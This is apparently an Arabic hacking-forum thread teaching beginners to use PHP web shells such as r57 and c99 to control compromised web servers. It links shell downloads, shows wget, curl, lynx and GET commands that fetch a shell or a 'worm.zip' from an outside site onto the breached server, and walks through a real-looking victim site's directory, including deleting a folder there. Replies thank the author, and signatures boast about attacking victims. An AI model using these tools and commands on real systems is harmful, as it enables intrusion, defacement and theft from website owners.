ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف

ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف


النتائج 1 إلى 10 من 10

الموضوع: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف

  1. #1

    افتراضي ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف

    وم عن الشل نبدأ الشرح
    بسم الله الرحمن الرحيم
    في البداية اكثر الاعضاء يسألون ماهو الشل؟؟؟ وماهي استخداماته؟؟؟ وماهي اوامره؟؟؟ الخ نبدأ على بركة الله
    ماهو الشل؟؟؟؟ وهو عبارة عن سكربت مكتوب بلغة phpshell ويعمل الشل كوسيط بينك وبين النظام الذي هو Linux حيث يستقبل الاوامر منك
    ويرسلها الى السيرفر المخترق وتعرض نتائج الاوامر على الشل.
    والان ما الفائدة منه؟؟ لان الكل يسمع عن الشل وما يعرف شنو استخداماته؟؟ وانا اقولك له استخدامات كثيرة فنحن الهكرز نستخدمه في السيطرة على السيرفرات
    والان جينا للمفيد يستخدم للسيطرة على السيرفر واحيانا السيطرة بشكل كامل على السيرفر والتنقل بالسيرفر ووتصفح ملفاته والتعديل عليها وهذا حسب صلاحياتك على السيرفر
    واكيد راح تقولي شنو صلاحياتي ؟؟ وانا اقولك الصلاحيات يعني شنو انت على السيرفر اي شنو موقعك من الاعراب هههههههههه واليكم انواع الصلاحيات على السيرفر
    1- Root اي انت مدير السيرفر يعني خلاص مافي شي يوقف قدامك تحذف تعدل تضيف حساب على السيرفر وكذا
    2- User هنا صلاحياتك على الموقع الي انت رافعلة شل فقط اكرر على الموقع الي انت رافعلة شل فقط اي تعدل تعطي تصاريح الا اذا انتقلت لحالة الرووت
    3- nobody, http, apache هنا كلها نفس الشي ما تقدر تحذف ملفات او تعطي تصاريح للملفات ولكن هذه الصلاحيات فيها ميزة حلوة وهي
    انك تقدر تتصفح الحسابات الي على السيرفر اي المواقع التي على السيرفر عكس صلاحيات اليوزر حيث صلاحياتك على الموقع الي انت رافعلة شل فقط
    ولكن في سؤال مهم وهي اكيد انت راح تقولي كيف اعرف صلاحياتي على السيرفر؟؟؟ وانا اقولك وانت في الشل تكتب id لمعرفة صلاحياتك وهو امر لينكس
    درسنا ممل اليوم ههههههههههه اتحملوني شباب انا اخوكم معلش
    ومن الكلام الي سبق اكيد انت استنجت شي وهي انك حتى تشغل الشل لازم ترفعة على موقع واكيد في سؤال بالطريق وهو كيف ارفع الشل على موقع؟؟؟
    وانا اقولك ولا يهمك يتم رفع الشل عن طريق الثغرات واكيد راح تسأل وتقول وش هي الثغرة؟؟؟؟ وانا اجاوبك مع انك مللتني من كثر اسالتك ههههههههههه
    الثغرة: وهي عبارة عن خطأ برمجي وضعف امني يساعدك في دخول نظام معين واختراقه واحيانا تساعدك الثغرة في الانتقال من حالة الى اخرى اي مثلا من نوبدي
    الى رووت حسب نوع الثغرة والثغرات تكون مكتوبة بلغة السي او البيرل او php الخ.....
    والان الحمد لله عرفتوا شنو الثغرة ولنفترض انك تمكنت من رفع شل على موقع ولكن اكيد انت تبي تعرف انواع الشل؟؟ وانا اقولك تامر امر هذي بعض الانواع:
    1- webadmin هذا الشل جيل ومفيد للمبتدئين لانه يسمحلك برفع الملفات وحذف الملفات وانشاء مجلد بكل سهولة ولتطبيق امر معين مثلا على ملف كل
    ما عليك هو انك تضغط على المكان الفارغ امام الملف المراد التعديل عليه واختار الي تبي تعديل حذف او غيره كذلك تستطيع حذف مجلد كامل فهو لا يحتاج الى اوامر لينكس.
    http://www.i-saudi.com/lezr.com/webadmin.zip

    2- MyShell هذا الشل جميل ولكن قديم وهو يعتمد على اوامر لينكس ويمكنك معرفة صلاحياتك بجانب الجملة Current User ومعرفة كل المجلدات
    الذي في المجلد الذي تتصفحه ورابط التحميل للشل http://www.i-saudi.com/lezr.com/MyShell-1.0.6.zip

    3- phpRemoteView شل جميل ومشابه لخصائص الشل webadmin وكل مجلد تود التعديل عليه استخدم الاسهم المقابلة لها ولكن هذا الشل فيه ميزة
    جميلة وهي انك تقدر تفك تشفير الــ md5 الخاصة بالمنتديات.http://www.i-saudi.com/lezr.com/phpRemoteView.zip

    4- phpshell-1.7 شل جميل وشبيه بالشل MyShell مفيد للمبتدئين
    http://www.i-saudi.com/lezr.com/phpshell-1.7.zip

    5- phpFileManager شل سهل جدا واوامره واضحة ولا يحتاج الى شرح
    http://www.i-saudi.com/lezr.com/phpF...ager-0.9.3.zip

    6- r57shell الشل الروسي الغني عن التعريف الذي انا افضله من بين كل هذه الشلات وهو يحتاج الى اوامر لينكس ولكن فيه اوامر البحث عن ملفات
    الكونفك واوامر سحب الملفات اي الدوال لسحب الملفات جاهزة كلها وفيه ميزة تحميل ملفات من جهازك الى الموقع المخترق من خلاله واما الاصدار الجديد منه (موجود في المنتدى اصداره الجديد منزله الاخ متكي ورا الشمس)
    فقد اضيفت له ثغرات وشغلات جميلة اكتشفها بنفسك ولكن سوف اشرح لكم هذا الشل في نهاية درسنا الممل هههههههههه

    7- phplab شل جميل ولكنه غير عملي ولا انصح المبتدئين به
    http://www.i-saudi.com/lezr.com/phplab.zip

    8- haexplorer شل ايضا جميل ولكن غير عملي ولا انصح المبتدئين باستخدامه
    http://www.i-saudi.com/lezr.com/haexplorer.zip

    9- php exploit lab شل ايضا جميل ولكن ايضا لا انصح المبتدئين به
    http://www.i-saudi.com/lezr.com/explorer.zip

    10- Ch99 شل جميل ورائع وفيه مميزات جميلة وهي انك تقدر تخترق قاعدة البيانات من خلاله عن طريق الاختيار sql وهذا الشل يسمحلك بتطبيق اوامر لينكس
    بالاضافة الى امكانية تصفح الملفات من خلاله كما في الشل webadmin ولكن باختيارات اوسع

    والان الحمد لله الكل عرف الشل وانواعه واستخدامه ولكن في سؤالين محد سألهم وهي اني من خلال الشرح تكلمت عن شغلتين وهي التصاريح؟؟؟ودوال سحب الملفات؟؟؟
    والجواب للسؤال الاول موجود في منتدى العاصفة موضوع لي في مملكة امن المواقع والشبكات قسم المبتدئين اسمه(شرح خرافي لاوامر لينكس+التصاريح بالتفصيل)الموضوع مثبت
    وبقي شي واحد وهو دوال السحب وسوف اشرحها بالتفصيل في درسنا لليوم لاحقا في وقتها.
    وشباب اكيد مليتوا وانا انصحكم روحوا شربوا فنجان قهوة وارجعوا ههههههههههه نكمل
    والان بعد ما الكل عرف ما هو الشل وانواعة واستخداماته راح اشرح لكم الشل الروسي r57 الي انا افضله بين الشلات الباقية اليكم شرحه بالصور:

    ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟

    والان اليكم الشرح حسب الترقيم في الصورة:
    1- phpinfo هنا لمشاهدة البرامج المثبته على السيرفر وسوف اشرحها في درس اخر
    2- السيف مود اوف والسيف مود هو حالة امنة يتم تفعيلها على السيرفر لمنع تطبيق الدوال.
    3- اصدار الينكس للسيرفر المخترق مع اخر تحديث له وهو 2005
    4- id وهو كما ذكرت صلاحياتك على السيرفر وهي نوبدي
    5- pwd مسارك على السيرفر اي مكان تواجدك
    6- ملفات السيرفر وهي ظاهرة في الصورة واليكم تكملة شرح الشل شوفو الصورة:

    ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟

    - هنا تكتب امر اللينكس مثلا id لمعرفة صلاحياتك
    2- هنا المسار الذي انت عليه او اكتب pwd لمعرفة مسارك
    3- هنا للتنفيذ اي عند كتابة امر اللينكس اضغط على هذا المستطيل (بالعربي اكتب الامر واضغط انتر)
    والان اشرح لكم دوال سحب الملفات والان اليكم الشرح وسوف اشرح على الدالة wget في البداية كشرح خفيف لمعرفة ان الدالة wget شغالة يجب
    كتابة الامر which wget وشوفوا الصورة:

    ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟

    وكما تلاحظون كتبنا الامر which wget في مربع تنفيذ الاوامر ونضغط انتر وشوفو النتيجة:

    ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟

    والان كما تلاحظون ظهر لنا الرد الذي في الصورة وهو usr/bin/wget/ اي ان الدالة شغالة والان نكتب امر السحب ولكن قبل كل ذلك يجب
    ان تتأكد من ان المجلد الذي سوف تسحب الشل له يملك التصريح 777 شوفوا الصورة:

    ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟

    كما تلاحظون الاختيارات:
    1- هذا هو التصريح 777 الذي يجب ان يكون بدون شرطات كما في الصورة
    2- هذا الاختيار هو المجلد الذي سوف نسحب له الملف الذي نريد
    والان كل شي جاهز المجلد ذو التصريح والملف الذي سوف نسحبه وانا هنا سوف اسحب الشل ch99 للتوضيح لا اكثر ويمكن انت بهذه الطريقة ان تسحب
    الاندكس الخاصة بالاختراق او اي شي اخر والان اكتب في مكان تنفيذ الاوامر wget http://www.site.com/shell.zip
    والشرح للايعاز wget دالتنا التي سوف نسحب بها الملف والموقع الذي بجنبها رفعنا له الشل مضغوط علشان نسحبه للموقع المخترق وعند كتابة الايعاز لن يظهر لك اي رد
    والان نحن رفعناه مضغوط فيجب فك ضغطه بالايعاز unzip shell.zip والرد سوف يظهر في الصورة:

    ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟

    كما تلاحظون الرد المحاط بالاحمر يدل على نجاح العملية والان ماذا لو لم تعمل هذه الدالة؟؟ اقولك ولا يهمك في دوال غيرها مثلا دالة curl ايضا اذا اردت
    التحقق من ان الدالة تعمل ما عليك الا كتابة which curl واليكم شرح بعض دوال السحب
    ولنفترض ان الملف الذي نود سحبه هو worm.zip نبدا بالاداة lynx وطريقة سحب الملف كما يلي
    lynx -source www.site.com/worm.zip > worm.zip
    والاداة curl استخدامها كالتالي
    curl -o worm.zip www.site.com/worm.zip
    واخيرا الدالة get استخدامها كالتالي
    GET www.site.com/worm.zip > worm.zip
    وكما شرحنا سابقا site.com هو الموقع الذي رفعنا الشل مضغوط له واذا اردتم معلومات اكثر عن رفع الشل شوفوا موضوعي في قسم المواضيع المتميزة لرفع الشل
    والان نكمل شرح الشل الروسي لنفترض انك عندك ملف وتبي ترفعة للسيرفر والملف على جهازك وش تسوي؟؟ اقولك ولا يهمك انزل بالشل للاسفل وشوف الاختيار هذا بالصورة:

    ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟

    الاختيار 1- هنا لاختيار الملف من جهازك ومعناه استعراض brouse
    2- هذا الاختيار معناه رفع اي عند الانتهاء من اختيار الملف من جهازك اضغط عليه والان شرح خفيف عن المسار الذي نحن فيه؟؟
    /mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/html
    كما تلاحظون المسار الذي نحن فيه نحن لسنا على المجلد الرئيسي واكيد را تقولي شلون عرفت؟؟ وانا اقولك المجلد الرئيسي اما انه يكون public_html
    او يكون على اسم الموقع كما في مسارنا او يكون www والي اخره حسب السيرفر والحين عرفتوا احنا ليش مو على المجلد الرئيسي ولكن اكيد راح تقولي ابي اصير
    على المجلد الرئيسي وانا اقول تامر امر احذف المجلد html واكتب الايعاز التالي
    cd /mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/
    مثل ما شفتوا حذفنا المجلد html وكتبنا الايعاز cd وهو يستخدم للدخول الى مجلد معين وتغيير المسار
    شباب الى هنا ينتهي درسنا وهذا الجزء الاول وانتظروا الجزء الثاني وهو تكملة شرح الشل الروسي وشرح الشل ch99 مع بعض الفنيات
    قانون الهكر
    وراء كل ابتسامة هكر .. دمعة ضحيه

    نعشق الموت لكي لا تعشقنا الحياة فدخلنا مدارس الهكر لنعاقب الحقراء

    ... لا نعرف الرحمه ولا نرضى بالتهديد لك حرية التعبير ولي حرية التهكير

    "....... نحن لا نخترق لكي نثبت اننا محترفون بل نضع بصمة في تاريخك ....... "

  2. #2
    هكر متميز الصورة الرمزية kaiser hackers
    تاريخ التسجيل
    Jan 2012
    الدولة
    United Kingdom-Britain-London
    المشاركات
    751

    افتراضي رد: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف

    مشكووووووووووووووور يا بطل على الشرح رايتك بيضاء
    قــــــيــــــصــــــر الــــــهــــــكــــــر

    أذآ فكرت في أختراقي سآرفع يدي أحترآم لك ولشجاعتك

    ولآكن تأكد أنني لن أنزلها ألى على حرق جهازك

    لآ أحب دخول الآجهزة بأحترآم أحب دخول الآجهزة بآجرام

    لتوآصل[email protected]

    قناتي على اليوتيوب



  3. #3

    افتراضي رد: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف

    مشكوووور يلغلا
    بس التنسيق سيء

    مبدع واصل ابداعك

  4. #4

    افتراضي رد: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف

    مشكووووووووووووووور يا بطل

  5. #5

    افتراضي رد: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف

    مشكوووووووووووووور
    اللهم انت ربي ... لا اله الا انت خلقتني.. وانا عبدك وانا على عهدك.. و وعدك ما استطعت اعوذ بك من شر ما صنعت.. ابوء لك بنعمتك علي .. وابوء لك بذنبي.. فاغفرلي يا رب.. فأنه لا يغفر الذنوب الا انت.

  6. #6

    افتراضي رد: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف

    يعطيك العااافيه

    واريد شل روسي يكون عربي

    ولا هنت ...

  7. #7

    افتراضي رد: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف

    ُ







    . , / مششـكُـور أخُـوي يحيَ عالـشرحح ,.
    . , , / و بالتوفِيــق يَ ررررب ,.

  8. #8

    افتراضي رد: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف

    مشكوووووووووووووور اخي على الشرح

  9. #9

    افتراضي رد: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف

    مشكووووووووووريا حبيبي على التوضيح

  10. #10

    افتراضي رد: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف

    شـــــــــكرا .............

المواضيع المتشابهه

  1. شل r57 شغال رابط الشل ومحتوى الشل في نوتباد رابط 100%100
    بواسطة ikuwaite في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 75
    آخر مشاركة: 11-26-2012, 07:22 PM
  2. للهاكر هنا كل انواع الشل الجديدة وداعا للشل القديم انواع الشل و جديد 2011 قنبلة
    بواسطة HaCkeRz3_____ AaLlGEEr!Ia في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 26
    آخر مشاركة: 01-01-2012, 10:42 PM
  3. ماهي وضيفة no-ip
    بواسطة القط الأسود في المنتدى قسم اختراق الأجهزة
    مشاركات: 9
    آخر مشاركة: 10-05-2011, 05:23 PM
  4. رفع الشل + ملف الشل + طريقة الدخول اليه
    بواسطة الحريف في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 12
    آخر مشاركة: 09-17-2010, 10:28 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •